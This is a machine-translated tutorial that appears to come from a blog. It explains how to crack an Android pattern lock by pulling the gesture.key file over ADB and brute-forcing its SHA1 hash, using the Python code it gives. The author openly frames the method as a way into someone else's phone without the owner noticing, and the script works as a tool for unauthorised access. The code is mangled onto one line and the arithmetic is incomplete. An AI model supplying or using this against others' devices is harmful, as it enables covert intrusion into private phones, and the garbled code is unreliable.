Android image lock cracking program based on Python and python android
The graphic lock of the Android phone is a 3x3 dot matrix. The number of connections in order can be reached to lock/unlock. At least four points must be connected, and up to nine points can be connected. On the Internet, there are also ways to delete the Mobile Phone graphic lock, that is, to directly remove the graphic lock function. But if you want to enter someone else's cell phone, but you don't want to be alert ...... You can refer to this article (Prerequisites: the mobile phone requires root and the debugging mode is enabled. Generally, if you have used software such as "Mobile assistant for pods" and " mobile assistant", you will be asked to enable the debugging mode. If you want to delete the built-in mobile phone software, you need to root the mobile phone ).
First, let's take a look at how Android phones mark these nine points. By reading the Android system source code, we can see that each point has its number, forming a 3x3 matrix, such:
00 01 02
03 04 05
06 07 08
If you set the unlock image to an "L" shape,
The order of these vertices is as follows: 00 03 06 07 08. The system writes down the number, encrypts the number (in hexadecimal format), and stores it in/data/system/gesture on the mobile phone. key File. We use a data cable to connect the mobile phone to the computer, and then ADB connects the mobile phone to download the file to the computer (command: adb pull/data/system/gesture. key gesture. key ),
Open gesture. key using the Hex and other hexadecimal editing programs, and you will find the SHA1-encrypted string in the file: c8c0b24a15dc8bbfd411427973574695230458f0,
When you unlock it next time, the system compares the pattern you have drawn to see if the corresponding number string is 0003060708 encrypted. If yes, it will be unlocked; if not, it will continue to be locked. So how many digits are there if all numeric strings are arranged? Think of the high school factorial, if you use 4 points to unlock the image, it is 9x8x7x6 = 3024 possibilities, the five vertices are 362880, and the six vertices are, the seven vertices are, and the eight vertices are, and the nine vertices are. A total of 985824 possibilities (However, this computation is not strict, because the points on the same line can only be connected to their adjacent points.). There are no more than 985824 possibilities. At first glance, it may take a few seconds for a computer to reveal these things.
If you know the principle, you can use a handwritten program to implement it. Python is used to complete the task. It mainly applies the hashlib module (SHA1 encryption for strings) and the itertools module (Python built-in, generates an arrangement and combination of 00-09 ). The main process is:
1. ADB connects to the mobile phone and obtains the gesture. key File.
2. Read the key file and store the string str_A
3. generate all possible numeric strings
4. Encrypt these numeric strings to obtain the str_ B string.
5. Compare str_A and str_ B.
6. If the strings A and B are the same, the numeric string num is the desired unlock order.
7. Print the numeric string num
The Code is as follows:
#-*-Coding: cp936-*-import itertoolsimport hashlibimport timeimport OS # Call cmd and ADB to connect to the mobile phone and read the SHA1-encrypted string OS. system ("adb pull/data/system/gesture. key gesture. key ") time. sleep (5) f = open ('gesture. key', 'R') pswd = f. readline () f. close () pswd_hex = pswd. encode ('hex') print 'encrypted password: % s' % pswd_hex # generate the unlock sequence to obtain ['00', '01', '02 ', '03 ', '04', '05 ', '06', '07 ', '08'] matrix = [] for I in range ): str_temp = '0' + str (I) matrix. append ( Str_temp) # Sort the-08 characters, at least four numbers are arranged, and at most all are arranged. min_num = 4max_num = len (matrix) for num in range (min_num, max_num + 1 ): # From 04-> 08 iter1 = itertools. permutations (matrix, num) # pick out n from 9 numbers and arrange list_m = [] list_m.append (list (iter1 )) # store all the generated arrays in the list_m list. for el in list_m [0]: # traverse all the arrays of the n numbers. strlist = ''. join (el) # convert list to str. [0003060708, 08] --> strlist_sha1 = hashlib. sha1 (strlist. decode ('hex ')). hexdigest () # encrypt the string SHA1 if pswd_hex = strlist_sha1: # Compare the string in the mobile phone file with the encrypted string. print 'unlock password: ', strlist
After obtaining the unlock password, the break should jump out of the loop. But Python does not jump out of the multi-loop statement. I wanted to set the flag and then keep making judgments. This step is skipped for running speed (Is there a better way to jump out of the multi-loop ?). In addition, many error-tolerant statements are omitted.